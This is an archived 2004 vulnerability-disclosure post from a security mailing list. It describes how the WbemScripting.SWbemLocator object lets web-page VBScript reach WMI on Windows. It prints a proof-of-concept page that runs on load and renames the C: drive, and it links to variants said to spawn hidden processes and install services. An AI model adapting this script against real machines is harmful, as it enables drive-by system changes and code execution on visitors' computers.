Vulnerability Development mailing list archives

WbemScripting.SWbemLocator - createobject allows... EVERYTHING!

From: Bartosz Kwitkowski <bartosz () wb pl>
Date: 4 Mar 2004 21:24:27 -0000



I would like to dedicate this discovery to Justyna.

WbemScripting.SWbemLocator - this object has access to WMI in Win XP ( i have Prof fully patched). , 2003 , any NT? I 
think, this vuln concerns all Windows where we can find WbemScripting.SWbemLocator.

I would not like to publish more exploits because of their dangerous use

more examples are at:

http://wb.pl/bartosz/wbem/process.htm - create process in hidden window
http://wb.pl/bartosz/wbem/installservice.htm - installs service
http://wb.pl/bartosz/wbem/changevolume.htm - changes volume of C:

HOME PAGE - http://wb.pl/bartosz/

example source:
<HTML>
<HEAD>
<TITLE>Change volume of disk</TITLE>
&lt;SCRIPT LANGUAGE="VBScript"> 
   
// I would like to dedicate this discovery to Justyna.

   Sub window_onload
   const impersonation = 3



   Set Locator = CreateObject("WbemScripting.SWbemLocator")
   Set Service = Locator.ConnectServer()
   Service.Security_.ImpersonationLevel=impersonation

   Set Process = Service.Get("Win32_LogicalDisk=""C:""")
 

Process.VolumeName = "bartosz kwitkowski
Process.Put_


end sub

&lt;/SCRIPT&gt;
</HEAD>
<BODY>
I would like to dedicate this discovery to Justyna.
</BODY>
</HTML>


ANY QUESTIONS? ASK ME!

Current thread:

WbemScripting.SWbemLocator - createobject allows... EVERYTHING! Bartosz Kwitkowski (Mar 04)
- [SPAM] RE: WbemScripting.SWbemLocator - createobject allows... EVERYTHING! jasonk (Mar 04)